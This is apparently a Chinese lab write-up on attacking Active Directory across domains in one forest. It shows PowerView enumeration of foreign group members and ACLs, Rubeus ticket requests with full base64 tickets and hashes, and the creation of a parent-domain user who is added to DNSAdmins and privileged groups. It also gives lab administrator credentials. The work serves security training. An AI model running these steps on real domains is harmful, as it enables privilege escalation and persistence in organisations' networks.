林内攻击-Foreign Groups & ACL Principals
1. 实验环境
- DC02(子域控制器)- 10.129.229.207(DHCP)/ 172.16.210.3(双网卡)
dev.inlanefreight.ad - DC01(父域控制器)- 172.16.210.99
inlanefreight.ad - DC02 的账号密码:
Administrator和HTB_@cademy_adm!
2. Foreign Group
在林内的AD中,可以吧子域的用户和组添加到父域的组中。此外,在AD中每个安全组都被指定了一个特定的 scope ,该作用域决定了其在域树或林中的应用范围
AD提供了以下的组作用域:
| Scope | Possible Members |
|---|---|
| Universal | 来自同一林中任何域的帐户、来自同一林中任何域的全局组以及来自同一林中任何域的其他通用组。 |
| Global | 来自同一域的帐户和来自同一域的其他全局组。 |
| Domain Local | 来自任何域或任何受信任域的帐户、来自任何域或任何受信任域的全局组、来自同一林中任何域的通用组、来自同一域的其他域本地组。此外还包括来自其他林和外部域的帐户、全局组和通用组。 |
从表中可以看出,在 Active Directory 结构中,父域具备将子域用户包含在父域的通用组或域本地组中的能力。
之所以可以是因为全局组受到严格限制,只能包含来自同一个域的用户。因此,为了在同一林内的跨域环境中实现更广泛的资源访问和权限管理,通用组和域本地组就成为了将子域用户纳入父域组结构的有效机制
除了这三个组作用域之外,“内置”容器中的默认组还具有
Built-in Local组作用域。但此组作用域和组类型无法更改
2.1. 枚举Foreign Group成员
可以使用powerview Get-DomainForeignUser 函数来枚举用户在林内域间的出站访问权限
2.1.1. 枚举在父域组中的成员
*Evil-WinRM* PS C:\Users\Administrator\Documents> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-DomainForeignUser
UserDomain : dev.INLANEFREIGHT.AD
UserName : jerry
UserDistinguishedName : CN=jerry,CN=Users,DC=dev,DC=INLANEFREIGHT,DC=AD
GroupDomain : INLANEFREIGHT.AD
GroupName : Inlanefreight_admins
GroupDistinguishedName : CN=Inlanefreight_admins,CN=Users,DC=INLANEFREIGHT,DC=AD
UserDomain : dev.INLANEFREIGHT.AD
UserName : jerry
UserDistinguishedName : CN=jerry,CN=Users,DC=dev,DC=INLANEFREIGHT,DC=AD
GroupDomain : INLANEFREIGHT.AD
GroupName : Inlanefreight_admins_bak
GroupDistinguishedName : CN=Inlanefreight_admins_bak,CN=Users,DC=INLANEFREIGHT,DC=AD
- 子域的用户
DEV\jerry是父域Inlanefreight_admins和Inlanefreight_admins_bak组的成员
2.1.2. 枚举更多父域组的信息
利用 PowerView 的 Get-DomainGroup 函数来收集有关 Inlanefreight_admins 组的全面信息
PS C:\Users\Administrator\Documents> Get-DomainGroup -Identity 'Inlanefreight_admins' -domain inlanefreight.ad
usncreated : 61628
admincount : 1
grouptype : UNIVERSAL_SCOPE, SECURITY
samaccounttype : GROUP_OBJECT
samaccountname : Inlanefreight_admins
whenchanged : 4/8/2024 10:20:24 AM
objectsid : S-1-5-21-2879935145-656083549-3766571964-2108
objectclass : {top, group}
cn : Inlanefreight_admins
usnchanged : 86372
dscorepropagationdata : {4/8/2024 10:20:24 AM, 1/1/1601 12:00:00 AM}
memberof : CN=Account Operators,CN=Builtin,DC=INLANEFREIGHT,DC=ADdistinguishedname : CN=Inlanefreight_admins,CN=Users,DC=INLANEFREIGHT,DC=AD
name : Inlanefreight_admins
member : CN=jerry,CN=Users,DC=dev,DC=INLANEFREIGHT,DC=ADwhencreated : 3/20/2024 10:05:01 PM
instancetype : 4
objectguid : 6ad8005c-99c1-40f5-b66a-3bd9fe885b97
objectcategory : CN=Group,CN=Schema,CN=Configuration,DC=INLANEFREIGHT,DC=AD
- 结果显示,
Inlanefreight_admins组是父域中 Account Operators 组的成员。
此外还可以用BloodHound来分析
2.2. Abusing Foreign Group Membership
使用 Rubeus 获取用户 DEV\jerry 的身份验证票证并将其存储在内存中,然后创建一个临时的 PowerShell.exe 进程,以确保存储在内存中的任何现有票证不受影响
2.2.1. Rubeus创建牺牲登录会话
PS C:\Users\Administrator\Documents> ./Rubeus createnetonly /program:powershell.exe /show
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Create Process (/netonly)
[*] Using random username and password.
[*] Showing process : True
[*] Username : I2JKQHMT
[*] Domain : 71XHFF2W
[*] Password : 7TJU7P5W
[+] Process : 'powershell.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 1720
[+] LUID : 0x32f9cd
这会打开一个新的 PowerShell 窗口。在这里,我们可以安全地为用户 Jerry 请求一个工单,避免与现有 klist 会话相关的任何问题
2.2.2. rubeus获取jerry的TGT
PS C:\Users\Administrator\Documents> .\Rubeus.exe asktgt /user:jerry /password:jerry /domain:dev.inlanefreight.ad /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Ask TGT
[*] Using rc4_hmac hash: 7C4EE43396C9A7B9EE52CED09DB516EA
[*] Building AS-REQ (w/ preauth) for: 'dev.inlanefreight.ad\jerry'
[*] Using domain controller: fe80::dcc7:cfe1:1414:803d%14:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
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
a3JidGd0GxRkZXYuaW5sYW5lZnJlaWdodC5hZA==
[+] Ticket successfully imported!
ServiceName : krbtgt/dev.inlanefreight.ad
ServiceRealm : DEV.INLANEFREIGHT.AD
UserName : jerry (NT_PRINCIPAL)
UserRealm : DEV.INLANEFREIGHT.AD
StartTime : 3/8/2026 4:54:21 AM
EndTime : 3/8/2026 2:54:21 PM
RenewTill : 3/15/2026 4:54:21 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : rNxNjtyKUvH++asco5iVLg==
ASREP (key) : 7C4EE43396C9A7B9EE52CED09DB516EA
2.2.3. 在父域中创建新的域用户
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> $SecPassword = ConvertTo-SecureString 'T3st@123' -AsPlainText -Force
PS C:\Tools> New-DomainUser -Domain inlanefreight.ad -SamAccountName testuser -AccountPassword $SecPassword
AdvancedSearchFilter : System.DirectoryServices.AccountManagement.AdvancedFilters
Enabled : True
<SNIP>
DisplayName : testuser
SamAccountName : testuser
UserPrincipalName :
Sid : S-1-5-21-2879935145-656083549-3766571964-2603
Guid : 6fa60861-806e-4706-90f3-db7b525bb40d
DistinguishedName : CN=testuser,CN=Users,DC=INLANEFREIGHT,DC=AD
StructuralObjectClass : user
Name : testuser
利用 account operators 的权限,成功创建名为 testuser 的新用户,此外我们还可以把这个用户添加到DNSAdmins组里面
2.2.4. 将创建的用户添加到 DNSAdmins 组
Add-ADGroupMember -identity "DNSAdmins" -Members testuser -Server inlanefreight.ad
3. 外部ACL主体
子域的用户或组也可能拥有针对父域中组或用户的访问控制列表,例如 GenericAll、Write Property、GenericWrite、Write Dacl和 WriteOwner等
通过向父域中的组或用户分配 ACL 权限,管理员可以授予来自子域的用户对这些组所管理的资源、目录或其他对象的不同级别访问权限。根据分配的具体 ACL 权限,这些权限可能包括读取、写入、修改或删除资源的权利
3.1. 枚举外部ACL主体
利用 powerview 的 Get-DomainObjectACL 函数可以进行针对性的枚举。
下面这个例子,我们将枚举用户 rita 拥有权限的所有域对象。这是通过将该用户的 SID(安全标识符)映射到 $sid 变量来实现的,该变量对应于 SecurityIdentifier 属性
3.1.1. 枚举用户 Rita 的 ACL
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> $sid = Convert-NameToSid rita
PS C:\Tools> Get-DomainObjectAcl -ResolveGUIDs -Identity * -domain inlanefreight.ad | ? {$_.SecurityIdentifier -eq $sid}
AceType : AccessAllowed
ObjectDN : CN=Infrastructure,CN=Users,DC=INLANEFREIGHT,DC=ADActiveDirectoryRights : GenericAllOpaqueLength : 0
ObjectSID : S-1-5-21-2879935145-656083549-3766571964-2110
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2901893446-2198612369-2488268719-2103
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
- 子域用户
DEV\rita对父域Infrastructure组拥有GenericAll
BloodHound同样可以枚举出来
3.2. 利用外部ACL主体
3.2.1. 使用 Rubeus 创建一个牺牲登录会话
还是先用Rubeus创建一个牺牲会话,避免对内存中的票据造成影响
PS C:\Tools> ./Rubeus createnetonly /program:powershell.exe /show
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.3
[*] Action: Create Process (/netonly)
[*] Using random username and password.
[*] Showing process : True
[*] Username : FLTNQYMI
[*] Domain : YH4TURBL
[*] Password : KNNI2TMI
[+] Process : 'powershell.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 4752
[+] LUID : 0x52dacc
3.2.2. 获取rita的tgt
PS C:\Tools> .\Rubeus.exe asktgt /user:rita /password:rita /domain:dev.inlanefreight.ad /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.3
[*] Action: Ask TGT
[*] Using rc4_hmac hash: 7C4EE43396C9A7B9EE52CED09DB516EA
[*] Building AS-REQ (w/ preauth) for: 'dev.inlanefreight.ad\rita'
[*] Using domain controller: fe80::7553:b64f:4793:6013%14:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIF9DCCBfCgAwIBBaEDAgEWooIE9DCCBPBhggTsMIIE6KADAgEFoRYbFERFVi5JTkxBTkVGUkVJR0hU
LkFEoikwJ6ADAgECoSAwHhsGa3JidGd0GxRkZXYuaW5sYW5lZnJlaWdodC5hZKOCBJwwggSYoAMCARKh
AwIBAqKCBIoEggSGilB6VD8Uji1ZMkbCAbtF1ghhfskgkn954xp6XnXR9ExHwq1dvKhPoqizpC/PGaas
1hPGKjEAyS6kZYqPyru9842uUduREtSxw8aOQ1dtPZAuimtA8AP8DEcU8bGqTgx05BJ+BS7D+9dVBlZR
Lfh5Dyw+SDX5u7GRO2HmObVpRPLLQhu9YPa2WJ9hBVEYmEt+4S+AGS50gLQckAgGmh/d61c0V6jNzPze
20wcH9/dJfc2N1bSAxs0V8A2XQoyw4QFj2QP1/GaUQCxmPDhhl5e7l5C1/OqX7vHt2ccI9DfrZNWZm+L
x2V+jTanTR6TMwlWFocSfREJyjZcJVGaVzH1eHvBBKyFr7Dwhifuq5witlno/+yto77OOl5YlehtL7IW
/aeRPVsAMWXTHBTHbH4pbGjmPW8pGZPWTza3aGQvjWtbyOdZjVIHeSvuyT2rpop22WT0MiFpOQElbGF0
cYE31Sao5Bkr1LfP0yeWwkQhnjb63YN+EgZ8AVlDFsavA9pblq/ZsjLJwoR8+EykSxf4roe33PbnZ/GK
o34dnPCtYu7laQEbCfk6oWEZQpbYBkYh7oKQ8DENgLevOSKLcFsU+E2b0yeiTzdfCUtUaf9pqgay77Q9
<SNIP>
[+] Ticket successfully imported!
ServiceName : krbtgt/dev.inlanefreight.ad
ServiceRealm : DEV.INLANEFREIGHT.AD
UserName : rita
UserRealm : DEV.INLANEFREIGHT.AD
StartTime : 3/21/2024 3:18:59 PM
EndTime : 3/22/2024 1:18:59 AM
RenewTill : 3/28/2024 3:18:59 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : 0eyJFXdpfTrRx1miTy+qSQ==
ASREP (key) : 7C4EE43396C9A7B9EE52CED09DB516EA
因为rita对父域的Infrastructure有 GenericAll 权限,可以使用 powerview 的 Add-DomainGroupMember 函数,将用户 DEV\rita 添加到父域中的 Infrastructure 组
3.2.3. 添加rita到父域Infrastructure组
PS C:\Tools> Add-DomainGroupMember -identity 'Infrastructure' -Members 'DEV\rita' -Domain inlanefreight.ad -Verbose
VERBOSE: [Get-PrincipalContext] Binding to domain 'inlanefreight.ad'
VERBOSE: [Get-PrincipalContext] Binding to domain 'dev.INLANEFREIGHT.AD'
VERBOSE: [Add-DomainGroupMember] Adding member 'DEV\rita' to group 'Infrastructure'
可以验证一下
PS C:\Tools> Get-DomainGroupMember -Identity 'Infrastructure' -Domain inlanefreight.ad -Verbose
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC02.DEV.INLANEFREIGHT.AD/DC=inlanefreight,DC=ad
VERBOSE: [Get-DomainGroupMember] Get-DomainGroupMember filter string:
(&(objectCategory=group)(|(samAccountName=Infrastructure)))
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC02.DEV.INLANEFREIGHT.AD/DC=inlanefreight,DC=ad
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(&(|(distinguishedname=CN=rita,CN=Users,DC=dev,DC=INLANEFREIGHT,DC=AD)))
3.3. 枚举所有外部用户的ACL
$Domain = "inlanefreight.ad"
$DomainSid = Get-DomainSid $Domain
Get-DomainObjectAcl -Domain $Domain -ResolveGUIDs -Identity * | ? {
($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner') -and `
($_.AceType -match 'AccessAllowed') -and `
($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and `
($_.SecurityIdentifier -notmatch $DomainSid)
}
建议优先处理已被攻破的高价值目标,因为会消耗大量的资源和时间,特别是针对大型的域中
3.3.1. 枚举所有用户的外部ACL
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> .\get-all-foreign-acl.ps1
AceType : AccessAllowed
ObjectDN : CN=Infrastructure,CN=Users,DC=INLANEFREIGHT,DC=AD
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-2879935145-656083549-3766571964-2110
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2901893446-2198612369-2488268719-2103
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
AceType : AccessAllowed
ObjectDN : CN=Server Admins,CN=Users,DC=INLANEFREIGHT,DC=AD
ActiveDirectoryRights : ListChildren, ReadProperty, GenericWrite
OpaqueLength : 0
ObjectSID : S-1-5-21-2879935145-656083549-3766571964-2111
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2901893446-2198612369-2488268719-2105
AccessMask : 131132
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
<SNIP>
利用 Get-DomainObjectAcl cmdlet 枚举所有域对象的 ACL。在 Where-Object 筛选器中,选择符合特定条件的 ACL,这些条件包括 Active Directory rights 、 ACE type 和 Security Identifier (SID) 模式匹配。此脚本能够有效地识别域中所有域用户的外部 ACL
但是获取到的用户都是用SID标识的,这不够直观,我们可以使用下面的命令将其转化为用户名
PS C:\Tools> ConvertFrom-SID S-1-5-21-2901893446-2198612369-2488268719-2103 DEV\rita